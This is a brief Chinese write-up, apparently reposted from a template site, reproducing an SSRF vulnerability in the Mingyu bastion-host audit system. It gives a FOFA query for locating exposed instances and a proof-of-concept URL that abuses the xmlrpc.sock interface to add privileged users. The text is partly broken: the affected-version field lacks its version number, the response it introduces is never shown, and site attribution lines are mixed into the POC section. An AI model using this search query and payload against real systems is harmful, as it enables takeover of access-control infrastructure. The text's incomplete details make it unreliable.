简介
明御®运维审计与风险控制系统是安恒信息在多年运维安全管理的理论和实践经验积累的基础上,采用B/S架构,集“身份认证、账户管理、控制权限、日志审计”于一体,支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询,具备全方位运维风险控制能力的统一安全管理与审计产品。
危害
明御运维审计与风险控制系统 xmlrpc.sock 接口存在SSRF漏洞,通过漏洞可以添加除超级管理员权限的其他权限用户从而控制堡垒机。
影响版本
以及之前的版本
漏洞复现
FOFA语法: "明御运维审计与风险控制系统"
POC:
/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc文章来源:https://www.toymoban.com/news/detail-833617.html
直接拼接url访问返回信息如下:文章来源地址https://www.toymoban.com/news/detail-833617.html
到了这里,关于明御运维审计与风险控制系统漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!